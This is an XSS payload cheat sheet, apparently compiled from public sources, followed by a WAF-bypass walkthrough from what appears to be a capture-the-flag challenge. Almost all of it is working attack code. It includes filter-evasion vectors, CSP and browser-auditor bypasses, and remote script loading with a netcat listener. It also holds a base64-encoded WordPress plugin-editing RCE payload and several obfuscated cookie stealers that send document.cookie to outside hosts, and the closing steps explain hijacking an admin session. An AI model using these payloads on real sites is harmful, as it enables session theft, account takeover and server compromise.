(escaping the escape)
\'-alert(1)//
Javascript Context
Tag Injection
</script><svg onload=alert(1)>
PHP_SELF Injection http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
Without Parenthesis <svg onload=alert`1`>
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#x28;1&#x29>
<svg onload=alert&#40;1&#41>
<svg onload=top.onerror=alert;throw'1'>
<svg onload=top.onerror=alert;throw[1]>
Filter Bypass
Alert Obfuscation (alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<script <script>>alert('l33t')</script>
<svg><script>alert('l33t')
<svg><script>alert&lpar;'l33t'&rpar;
<script>\u0061lert('l33t')</script>
<script>eval('\x61lert(\'l33t\')')</script>
[NewLine press enter]eval('\x61lert(\'l33t\')'
[\u2028]eval('\x61lert(\'l33t\')'<script>eval(8680439..toString(30))(983801..toString(36))</script>
http://11.xss.labs%[email protected]/x.js
Body Tag <body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors <marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
Agnostic Event Handlers <x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
<x onmouseenter=alert(1)>hover me!
<x onafterscriptexecute=alert(1)>
<x onbeforescriptexecute=alert(1)>
Code Reuse
Inline Script <script>alert(1)//
<script>alert(1)<!–
Code Reuse
Regular Script <script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
Filter Bypass
Generic Tag + Handler
Encoding
Mixed Case
Spacers
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
<X onxxx=1
<x OnXxx=1
<X OnXxx=1
Doubling
<x onxxx=1 onxxx=1
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
Quotes Stripping Mimetism
<x 1='1'onxxx=1
<x 1="1"onxxx=1 <[S]x onx[S]xx=1
[S] = stripped char or string <x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/
Generic Source Breaking
<x onxxx=alert(1) 1='
Browser Control <svg onload=setInterval(function(){with(document)body.
appendChild(createElement('script')).src='//HOST:PORT'},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Multi Reflection
Double Reflection
Single Input Single Input (script-based)
'onload=alert(1)><svg/1=' '>alert(1)</script><script/1='
*/alert(1)</script><script>/*
Triple Reflection
Single Input Single Input (script-based)
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1=' */</script>'>alert(1)/*<script/1='
Multi Input
Double Input Triple Input
p=<svg/1='&q='onload=alert(1)> p=<svg 1='&q='onload='/*&r=*/alert(1)'>
Without Event Handlers <script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<svg><x><script>alert(1)</x>
<svg><use xlink:href='
J1dGUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIge
G1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsi
Pg0KPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3h
odG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuZG9tYW
luKSIvPjwvc3ZnPg==#brute>
Mobile Only
Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
Javascript
Properties Functions
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)> <svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>
Generic Self to Regular XSS <iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
File Upload Injection in Filename
"><img src=1 onerror=alert(1)>.gif
Injection in Metadata
$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg
Injection with SVG File
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
Google Chrome
Auditor Bypass
(up to v51) <script src="data:&comma;alert(1)//
"><script src=data:&comma;alert(1)//
<script src="//brutelogic.com.br&sol;1.js&num;
"><script src=//brutelogic.com.br&sol;1.js&num;
<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
"><embed allowscriptaccess=always src=//brutelogic.com.br/2.swf#
<embed allowscriptaccess=always src="//brutelogic.com.br/2.swf#
"><object allowscriptaccess=always data=//brutelogic.com.br&sol;2.swf&num;
<object allowscriptaccess=always data="//brutelogic.com.br&sol;2.swf&num;
"><base href=//HOST/
<base href="//HOST/
PHP File for
XHR Remote Call <?php header(“Access-Control-Allow-Origin: *”); ?>
<img src=1 onerror=alert(1)>
Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
Shortest PoC <base href=//0>
$ while:; do echo "alert(1)" | nc -lp80; done
Portable Wordpress RCE <script/src="data:&comma;eval(atob(location.hash.slice(1)))//&num;
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=
http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
Multi Context Source-based
</script>"-alert(0)-"><svg onload=';alert(1);'>
DOM-based
#//3334957647/0/?0=">"<img src='-alert(1)-' onerror=";alert(1);">
CSP Bypass <script/src=/PATH/PAGE.json?callback=alert(1)//></script>
Shortest Event Handler
<svg><animate attributename=x end=1 onend=alert(1)>
Best-fit Mappings Uppercase
<SCRİPT>alert(1)</SCRİPT>
<SCRİPT/SRC=data:,alert(1)>
Overlong UTF-8
ʺ><svg onload=alert(1)>
%CA%BA%EF%BC%9E%EF%BC%9Csvg onload
%EF%BC%9Dalert%EF%BC%881%EF%BC%89%EF%BC%9E
<script>eval(8680439..toString(30))(983801..toString(36))</script>
http://11.xss.labs%[email protected]/x.js
=== EXTRA HERE AND HERE ===
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
http://d3adend.org/xss/ghettoBypass
https://html5sec.org/
http://htmlpurifier.org/live/smoketests/xssAttacks.php
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Filter_bypass_based_polyglot
====TRICKS====
<keygen autofocus onfocus=bbb=String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47,117,104,102,102,114,119,54,114,107,117,57,118,53,99,48,121,102,121,101,56,110,106,57,49,117,115,48,105,111,55,46,98,117,114,112,99,111,108,108,97,98,111,114,97,116,111,114,46,110,101,116,63,99,111,111,107,105,101,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101),bbb.replace(/.+/,eval)>xsss</keygen>
<input autofocus onfocus=
<select autofocus onfocus=
<textarea autofocus onfocus=
<keygen autofocus onfocus=
<form><button onfocus=alert(1); autofocus>
<keygen autofocus onfocus=write(atob(&quot;PHNjcmlwdD50b3AubG9jYXRpb249Jy8vc2VuZC5oZXJlLm1lPycrZG9jdW1lbnQuY29va2llPC9zY3JpcHQ+&quot;))>
===================================================================================================================
Finding the right Javascript event attribute
The challenge here is to find an event handler that can both be placed on an HTML tag and is not blacklisted by the WAF/IDS, so that we can execute some Javascript.
Too bad we can’t use onload= or onerror=. Thankfully onfocus does not seem to be blocked by the WAF/IDS. It has the ability to execute Javascript when an HTML element is in focus. We can force this focus with the HTML ’autofocus’ attribute:
<form><button onfocus=alert(1); autofocus>
Now we still need to beat the WAF/IDS to inject any useful Javascript. The above won’t work because alert() is blocked. We will do the following four things to allow us to execute any Javascript:
Create text with String.fromCharCode()
Create an anonymous function
Access the function ’document.write’
Create the native function ’eval’ out of a string
===Strings===
Creating strings with ’String.fromCharCode()’ is easy; we can build both our ’eval’ string and the rest of our payload this way.
Obtaining eval function
Now we need to somehow convert the string ’eval’ into the native eval Javascript function:
x=String.fromCharCode(101,118,97,108);
x=this[x];
y=String.fromCharCode(97,108,101,114,116,40,49,41)
x(x(y));
This will execute ’alert(1)’.
===Anonymous function===
As for the anonymous function, we need to make it like below:
onfocus=(function(){ alert(1); })
Otherwise the ’this’ in ’x=this[x]’ won’t work — we need a function scope to operate in.
Obtaining document.write
The only thing left is to find a way to use ’document.write’. Luckily, this is easily done with:
a=document;
a.write(String.fromCharCode(......));
Now we can finally put everything together. Let’s inject an img tag with its src attribute set to our cookie stealer.
<img src="http://example.com/?c=COOKIE_HERE"/>
Final payload
<form><button onfocus=(function(){a=document;x=String.fromCharCode(101,118,97,108);x=this[x];y=String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39)+String.fromCharCode(60, 105,109,103,32,115,114,99,61,34,104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,99,111,109,47,63,99, 61)+a.cookie+String.fromCharCode(34,47,62)+String.fromCharCode(39,41,59);x(x(y));})() autofocus>p0wn3d
1) admin visits page
2) document focuses on injected button
3) javascript will be executed
4) Cookie sent to our server
Use the cookie to log in as admin and retrieve the flag.